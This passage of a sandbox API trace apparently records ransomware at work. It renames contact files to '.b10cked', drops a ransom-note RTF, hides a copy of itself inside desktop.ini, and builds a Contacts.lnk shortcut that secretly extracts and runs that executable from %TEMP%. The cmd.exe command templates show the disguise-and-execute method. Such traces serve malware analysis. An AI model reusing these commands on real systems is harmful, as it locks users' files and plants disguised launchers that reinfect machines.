\"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x968, dwThreadId=0xaa4)) returned 1 [0217.554] CloseHandle (hObject=0x120) returned 1 [0217.554] CloseHandle (hObject=0x1b4) returned 1 [0217.554] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0217.554] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0217.554] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount2=26) returned 3 [0217.554] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0217.554] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0217.554] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0217.554] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0217.555] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0217.555] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0217.555] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0217.555] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0217.555] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0217.555] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8c8, dwThreadId=0xc04)) returned 1 [0217.561] CloseHandle (hObject=0x120) returned 1 [0217.561] CloseHandle (hObject=0x1b4) returned 1 [0217.561] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf")) returned 0xffffffff [0217.561] GetLastError () returned 0x2 [0217.561] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0217.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf")) returned 0x20 [0217.564] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.564] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0217.564] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0217.564] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0217.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0217.564] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0217.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0217.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0217.564] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0217.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts") returned 0x19 [0217.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0217.565] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0217.565] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe3c, dwThreadId=0xbc4)) returned 1 [0217.624] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0218.486] CloseHandle (hObject=0x1b4) returned 1 [0218.486] CloseHandle (hObject=0x120) returned 1 [0218.486] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0218.486] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0218.486] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0218.486] GetTickCount () returned 0x3d0b6 [0218.486] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27527572333) returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x79\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0218.487] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0218.487] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0218.487] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0218.487] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0218.487] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0218.487] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0218.487] CoInitialize (pvReserved=0x0) returned 0x0 [0218.487] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0218.488] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0218.488] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0218.488] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0218.490] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\y5l8rlAV.exe\" && \"%TEMP%\\y5l8rlAV.exe\"") returned 0x0 [0218.490] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0218.490] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0218.490] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0218.490] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Contacts.lnk", fRemember=0) returned 0x0 [0218.498] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0218.498] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0218.498] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0218.498] CoUninitialize () [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27528935531) returned 1 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3 [0218.501] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4eb [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4eb [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 